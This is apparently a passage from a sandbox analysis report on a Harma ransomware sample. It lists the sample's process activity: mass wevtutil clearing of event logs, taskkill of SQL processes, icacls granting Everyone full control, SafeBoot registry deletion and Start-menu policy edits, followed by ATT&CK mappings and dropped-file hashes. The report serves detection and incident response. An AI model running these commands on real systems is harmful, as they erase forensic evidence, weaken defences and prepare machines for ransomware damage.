    wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
    3⤵
    PID:1884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
    3⤵
    - Clears Windows event logs
    PID:1000
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
    3⤵
    PID:1484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
    3⤵
    PID:1160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
    3⤵
    PID:1668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
    3⤵
    PID:1192
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
    3⤵
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
    3⤵
    PID:904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
    3⤵
    PID:1924
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
    3⤵
    - Clears Windows event logs
    PID:956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1140
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
    3⤵
    PID:772
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
    3⤵
    - Clears Windows event logs
    PID:804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
    3⤵
    PID:1124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
    3⤵
    PID:1048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
    3⤵
    PID:1640
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
    3⤵
    PID:1472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
    3⤵
    PID:936
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
    3⤵
    PID:216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
    3⤵
    - Clears Windows event logs
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
    3⤵
    - Clears Windows event logs
    PID:304
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
    3⤵
    - Clears Windows event logs
    PID:908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
    3⤵
    PID:1580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
    3⤵
    PID:1696
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
    3⤵
    PID:236
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
    3⤵
    PID:1760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
    3⤵
    PID:844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1888
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
    3⤵
    PID:1952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
    3⤵
    - Clears Windows event logs
    - Drops file in Windows directory
    PID:1096
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1716
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
    3⤵
    PID:1856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
    3⤵
    PID:1460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
    3⤵
    PID:1940
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
    3⤵
    PID:1052
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
    3⤵
    PID:1792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
    3⤵
    PID:1992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
    3⤵
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
    3⤵
    PID:1508
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
    3⤵
    PID:1440
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
    3⤵
    PID:572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1256
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
    3⤵
    PID:1156
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
    3⤵
    PID:1092
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
    3⤵
    PID:1032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
    3⤵
    PID:1248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
    3⤵
    PID:1420
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
    3⤵
    PID:1872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
    3⤵
    PID:1728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
    3⤵
    PID:1736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
    3⤵
    - Clears Windows event logs
    PID:932
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
    3⤵
    PID:2020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
    3⤵
    PID:1360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
    3⤵
    - Clears Windows event logs
    PID:1452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
    3⤵
    - Clears Windows event logs
    PID:676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Help/Operational"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
    3⤵
    PID:208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
    3⤵
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
    3⤵
    - Clears Windows event logs
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
    3⤵
    PID:228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
    3⤵
    PID:1168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
    3⤵
    PID:436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
    3⤵
    PID:1604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
    3⤵
    PID:1864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
    3⤵
    - Clears Windows event logs
    PID:864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
    3⤵
    PID:848
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
    3⤵
    PID:1808
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
    3⤵
    PID:1584
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:812
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-International/Operational"
    3⤵
    PID:1676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
    3⤵
    - Enumerates connected drives
    PID:1492
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:920
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
    3⤵
    PID:1720
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1652
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
    3⤵
    PID:1620
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
    3⤵
    PID:1884
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
    3⤵
    PID:1000
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
    3⤵
    PID:1484
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1160
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
    3⤵
    PID:2044
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
    3⤵
    - Enumerates connected drives
    PID:1668
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
    3⤵
    PID:1192
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2004
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
    3⤵
    PID:904
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
    3⤵
    PID:1924
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
    3⤵
    - Enumerates connected drives
    PID:1140
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
    3⤵
    PID:956
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
    3⤵
    - Clears Windows event logs
    PID:772
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
    3⤵
    - Enumerates connected drives
    PID:804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
    3⤵
    PID:1124
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1048
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
    3⤵
    PID:1640
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
    3⤵
    - Enumerates connected drives
    PID:1472
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
    3⤵
    PID:936
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
    3⤵
    - Clears Windows event logs
    PID:216
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
    3⤵
    PID:1512
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
    3⤵
    PID:304
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
    3⤵
    PID:908
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
    3⤵
    PID:1580
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
    3⤵
    PID:1696
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
    3⤵
    PID:236
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
    3⤵
    - Clears Windows event logs
    PID:280
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
    3⤵
    - Clears Windows event logs
    PID:1760
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
    3⤵
    - Enumerates connected drives
    PID:844
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
    3⤵
    PID:1888
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
    3⤵
    PID:1952
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
    3⤵
    - Enumerates connected drives
    PID:1096
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
    3⤵
    PID:1716
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
    3⤵
    PID:1856
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
    3⤵
    PID:1460
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
    3⤵
    PID:1940
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
    3⤵
    PID:1052
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1792
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
    3⤵
    PID:1992
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:1136
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
    3⤵
    - Clears Windows event logs
    - Suspicious use of AdjustPrivilegeToken
    PID:1508
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
    3⤵
    PID:1440
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
    3⤵
    - Clears Windows event logs
    PID:572
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
    3⤵
    PID:1256
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
    3⤵
    PID:1804
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
    3⤵
    PID:1156
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1596
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
    3⤵
    PID:1092
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
    3⤵
    - Clears Windows event logs
    PID:1032
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
    3⤵
    PID:1248
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
    3⤵
    PID:1420
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1012
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
    3⤵
    PID:1872
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
    3⤵
    PID:1728
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:1736
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
    3⤵
    PID:932
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
    3⤵
    PID:2020
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
    3⤵
    PID:1360
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
    3⤵
    PID:1452
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
    3⤵
    - Clears Windows event logs
    PID:676
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
    3⤵
    PID:1088
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
    3⤵
    PID:208
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
    3⤵
    - Clears Windows event logs
    PID:220
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
    3⤵
    PID:204
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
    3⤵
    PID:228
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
    3⤵
    - Clears Windows event logs
    PID:1168
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
    3⤵
    PID:436
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
    3⤵
    PID:1604
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
    3⤵
    - Clears Windows event logs
    PID:1864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
    3⤵
    PID:864
- - C:\Windows\system32\wevtutil.exe
    wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
    3⤵
    PID:848

C:\Windows\system32\cmd.exe
cmd.exe /c taskkill /t /f /im sql*
1⤵
- Suspicious use of WriteProcessMemory
PID:1508
- C:\Windows\system32\taskkill.exe
  taskkill /t /f /im sql*
  2⤵
  - Kills process with taskkill
  - Suspicious use of AdjustPrivilegeToken
  PID:2028

C:\Windows\system32\cmd.exe
cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
1⤵
PID:1472
- C:\Windows\system32\icacls.exe
  icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  2⤵
  - Modifies file permissions
  PID:1124

C:\Windows\system32\reg.exe
reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
1⤵
PID:1580

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1672

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
1⤵
PID:1692

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
1⤵
PID:572

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Hidden Files and Directories

T1158

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

File Deletion

T1107

File and Directory Permissions Modification

T1222

Hidden Files and Directories

T1158

Indicator Removal on Host

T1070

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\HRMPRIV

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
C:\ProgramData\HRMPRIV

Filesize
2KB

MD5
bcccc2b671857e95be017fdb0138c9f2

SHA1
8c25a6b1d71ef38c1a290947e8e3b387974b6fe3

SHA256
76c254e74dbb96c14c6dbdcff132afa610b50e0c289c959873deb93092930c44

SHA512
6ec891d922d209c5855eb68ce31ceed4783c34ebac6f00359e846261f45dea4982f4bc2778d98c516b3c396670717bce05c7db0f33fb0a21342019f677dedd16

Download Submit
C:\ProgramData\HRMPUB

Filesize
292B

MD5
2c1d2ab5cd3ffa76efe497c6b4228d8a

SHA1
8fc436c4209abbf4ce980af87685c13e82d32453

SHA256
13c408b70e2e4cd42e23ac033567aca2253bd764b9a3ed22d9d6c4b8ca067da9

SHA512
71ce73e71eaf3ba5876236c03d5ae0b8c7d949997fc738ffa6336f9d9a597ae357f2d1ec10420ea22640f4a842251f04051c9bf6f06ee4b35e0010b8895ebb80

Download Submit
C:\ProgramData\HRMPUB

Filesize
292B

MD5
2c1d2ab5cd3ffa76efe497c6b4228d8a

SHA1
8fc436c4209abbf4ce980af87685c13e82d32453

SHA256
13c408b70e2e4cd42e23ac033567aca2253bd764b9a3ed22d9d6c4b8ca067da9

SHA512
71ce73e71eaf3ba5876236c03d5ae0b8c7d949997fc738ffa6336f9d9a597ae357f2d1ec10420ea22640f4a842251f04051c9bf6f06ee4b35e0010b8895ebb80

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe

Filesize
1.0MB

MD5
5c36e305d926e55ef98d392176890cd2

SHA1
64a15cdf89b6c8b85cba355b6944074614d810fd

SHA256
5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

SHA512
082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b

Download Submit
C:\ProgramData\harma.exe

Filesize
1.0MB

MD5
5c36e305d926e55ef98d392176890cd2

SHA1
64a15cdf89b6c8b85cba355b6944074614d810fd

SHA256
5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

SHA512
082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b

Download Submit
C:\ProgramData\id.harma

Filesize
8B

MD5
298edc75502a7789bbf6550c8da27e0c

SHA1
5611952989c783a088036fb5b35a6980b47aab0c

SHA256
2e27949da200ef0ad37c331a85bd7bc622a9526a1cd5e1b93a47f7c334a56ad4

SHA512
b75b8e883e5477f8c33a8cc014ef810478557b6976df9296f818bafb33870981281531fa6964461c3ddbcdeb178bf55e98ebdce9f1e47f0a2b8225a8ff40c03a

Download Submit
C:\Users\Admin\AppData\Local\Temp\HRMPRIV

Filesize
2KB

MD5
bcccc2b671857e95be017fdb0138c9f2

SHA1
8c25a6b1d71ef38c1a290947e8e3b387974b6fe3

SHA256
76c254e74dbb96c14c6dbdcff132afa610b50e0c289c959873deb93092930c44

SHA512
6ec891d922d209c5855eb68ce31ceed4783c34ebac6f00359e846261f45dea4982f4bc2778d98c516b3c396670717bce05c7db0f33fb0a21342019f677dedd16

Download Submit
C:\Users\Admin\AppData\Local\Temp\HRMPUB

Filesize
292B

MD5
2c1d2ab5cd3ffa76efe497c6b4228d8a

SHA1
8fc436c4209abbf4ce980af87685c13e82d32453

SHA256
13c408b70e2e4cd42e23ac033567aca2253bd764b9a3ed22d9d6c4b8ca067da9

SHA512
71ce73e71eaf3ba5876236c03d5ae0b8c7d949997fc738ffa6336f9d9a597ae357f2d1ec10420ea22640f4a842251f04051c9bf6f06ee4b35e0010b8895ebb80

Download Submit
C:\Users\Admin\AppData\Local\Temp\id.harma

Filesize
8B

MD5
298edc75502a7789bbf6550c8da27e0c

SHA1
5611952989c783a088036fb5b35a6980b47aab0c

SHA256
2e27949da200ef0ad37c331a85bd7bc622a9526a1cd5e1b93a47f7c334a56ad4

SHA512
b75b8e883e5477f8c33a8cc014ef810478557b6976df9296f818bafb33870981281531fa6964461c3ddbcdeb178bf55e98ebdce9f1e47f0a2b8225a8ff40c03a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\harma.exe

Filesize
1.0MB

MD5
5c36e305d926e55ef98d392176890cd2

SHA1
64a15cdf89b6c8b85cba355b6944074614d810fd

SHA256
5671112c276673ee5c4630994ac0034927cee2aa05a32ca6950edbc80c56e7e8

SHA512
082855fadbe445ab1f582bb7773276c08bded82ecd00ae1651b620aa12e97315d01acea3cfbe99c504d6d74ce1cff471a4993ff8ebb93416df787cefa88baf1b

Download Submit
C:\Users\Admin\Desktop\HRMPRIV

Filesize
2KB

MD5
bcccc2b671857e95be017fdb0138c9f2

SHA1
8c25a6b1d71ef38c1a290947e8e3b387974b6fe3

SHA256
76c254e74dbb96c14c6dbdcff132afa610b50e0c289c959873deb93092930c44

SHA512
